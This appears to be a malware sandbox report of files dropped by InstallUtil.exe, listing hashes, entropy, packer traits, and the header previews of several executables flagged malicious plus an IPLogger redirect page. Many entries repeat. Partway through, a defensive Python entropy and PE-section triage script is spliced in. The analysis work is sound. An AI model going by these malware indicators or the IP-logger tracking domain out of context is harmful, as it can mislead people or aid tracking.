                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4283784
                                                                                                                                                                                                                                Entropy (8bit):7.981853182461957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                                                                                                                                MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                                                                                                                                SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                                                                                                                                SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                                                                                                                                SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.76847526358866
Encrypted:false
SSDEEP:49152:cnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHs:PWqlkLESgCRE/vhOjb05efd6e/oXHs
MD5:F8C33520D6D06C0F3B8C9DE7EFE12DC9
SHA1:8568BA16B1E1ECFE3DBA3AEF2D6187A4D85E221B
SHA-256:7D1D1D76E93C341339533CDECC6E87DE0C56F5DE11EEADCD5AACB70D58153824
SHA-512:3644A16704884149EA1C3B1B2F0691DF21C7F1B55E6E07C56B8E5592D2D130AEF11F40BC19B30366E17360086E65131E3392CF20ECAEADC2C3A26977ED1D6FD7
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S...........@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.7684771261859815
Encrypted:false
SSDEEP:49152:FnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHE:cWqlkLESgCRE/vhOjb05efd6e/oXHE
MD5:3C75E585255021AE084FD75240484292
SHA1:D15CE968C04EC6D6EA5DC0EBA56CF3B734E48649
SHA-256:45D15D98B8A5F60A5EE36967677E1A6554425C160A07584D9A1736FB7E9C5A3D
SHA-512:0E25CDD738C2A373C001B8EEA0A057952375269140AF931EEB9E60EA3847872B356B123B4F380055253DF550B13043B08052FB863B55485E3BFBBEA8A81168C9
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......#....@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
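The dropped-file entries above carry three fields a triage script reproduces offline: the 8-bit entropy of the whole file, the Encrypted flag (set on the 2172545-byte file at entropy 7.9948 but not on the 4283784-byte file at 7.9819), and a raw header preview whose section names identify the build tool or packer (.text/.rdata/.data/.rsrc from a Microsoft linker, CODE/DATA/BSS with the "This program must be run under Win32" stub from a Borland linker, UPX0/UPX1 with the "4.22.UPX!" marker from UPX). The Python below is an added example, not part of the Joe Sandbox report: it computes Shannon entropy, walks the DOS header, PE signature, COFF header and section table, and flags packer-style layouts. The sample image is constructed in-code (a non-executable PE32 mimicking the UPX layout: a UPX0 section with no raw data and a uniform-byte UPX1), and the 7.9 threshold and the packer section-name list are our own assumptions, not the sandbox's Encrypted rule.

```python
# Added example (not part of the sandbox report): entropy + PE section-table triage.
# The sample image, the 7.9 threshold and the packer-name list are assumptions.
import math
import struct
from collections import Counter
from dataclasses import dataclass, field
from typing import List

PACKER_SECTION_NAMES = {"UPX0", "UPX1", "UPX2", ".aspack", ".adata", ".vmp0", ".vmp1", ".themida"}
HIGH_ENTROPY = 7.9  # assumption: our own triage cut-off, not the sandbox's "Encrypted" rule


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for constant data, 8.0 for uniform."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


@dataclass
class Section:
    name: str
    virtual_size: int
    raw_size: int
    raw_offset: int
    entropy: float


@dataclass
class PEInfo:
    machine: int
    overall_entropy: float
    sections: List[Section] = field(default_factory=list)
    packer_hint: bool = False


def parse_pe(data: bytes) -> PEInfo:
    """Walk DOS header -> PE signature -> COFF header -> section table (ValueError if malformed)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, _ts, _symptr, _nsyms, opt_size, _flags = struct.unpack_from("<HHIIIHH", data, coff)
    info = PEInfo(machine=machine, overall_entropy=shannon_entropy(data))
    table = coff + 20 + opt_size  # section headers follow the 20-byte COFF header and the optional header
    for i in range(nsections):
        (raw_name, vsize, _vaddr, rsize, roff,
         _preloc, _plines, _nreloc, _nlines, _chars) = struct.unpack_from("<8sIIIIIIHHI", data, table + i * 40)
        name = raw_name.rstrip(b"\x00").decode("latin-1")
        info.sections.append(Section(name, vsize, rsize, roff, shannon_entropy(data[roff:roff + rsize])))
        # Heuristic: a known packer name, or a UPX-style first section with no raw data but a
        # large virtual size (the unpacked image is written there at run time).
        if name in PACKER_SECTION_NAMES or (i == 0 and rsize == 0 and vsize > 0):
            info.packer_hint = True
    return info


def triage(data: bytes) -> dict:
    """Summarise what a dropped-file entry reports: whole-file entropy, per-section entropy, packer hint."""
    info = parse_pe(data)
    return {
        "machine": hex(info.machine),
        "entropy": round(info.overall_entropy, 3),
        "sections": [(s.name, s.raw_size, round(s.entropy, 3)) for s in info.sections],
        "packer_hint": info.packer_hint,
        "likely_packed_or_encrypted": info.packer_hint or info.overall_entropy >= HIGH_ENTROPY,
    }


def build_sample_pe() -> bytes:
    """Constructed, non-executable PE32 image mimicking a UPX layout: UPX0 with no raw data,
    UPX1 holding a uniform (8.0-bit) payload, and a low-entropy .rsrc."""
    opt_size = 224                                   # PE32 optional header size
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))      # e_lfanew: PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, opt_size, 0x0102)  # i386, three sections
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    first_raw = 512                                  # file alignment of the first raw section
    packed = bytes((i * 131 + 7) % 256 for i in range(4096))  # each byte value 16 times -> entropy 8.0
    rsrc = b"\x00" * 512 + b"A" * 512                # two equally likely symbols -> entropy 1.0
    def sec(name: bytes, vsize: int, vaddr: int, rsize: int, roff: int, chars: int) -> bytes:
        return struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\x00"), vsize, vaddr, rsize, roff, 0, 0, 0, 0, chars)
    sections = (sec(b"UPX0", 0x26000, 0x1000, 0, 0, 0xE0000080)
                + sec(b"UPX1", 0x1000, 0x27000, len(packed), first_raw, 0xE0000040)
                + sec(b".rsrc", 0x400, 0x28000, len(rsrc), first_raw + len(packed), 0xC0000040))
    image = bytearray(dos + b"PE\x00\x00" + coff + opt + sections)
    image += b"\x00" * (first_raw - len(image))      # pad headers up to the first raw section
    image += packed + rsrc
    return bytes(image)


if __name__ == "__main__":
    print(triage(build_sample_pe()))
```

Run it against a real dropped file with `triage(open(path, "rb").read())`. Two lessons from the entries themselves: the sandbox's Encrypted flag flips between entropy 7.9819 and 7.9948, so at the top of the scale a single whole-file figure is a poor discriminator and per-section entropy (packed UPX1 versus a plain-text .rsrc) is the better signal; and the 7446-byte entry is an HTML document (an IPLogger/yip.su redirect page at entropy 5.42), which is why parse_pe rejects non-MZ input rather than assuming every dropped file is a PE.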
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2172545
Entropy (8bit):7.994835824960051
Encrypted:true
SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
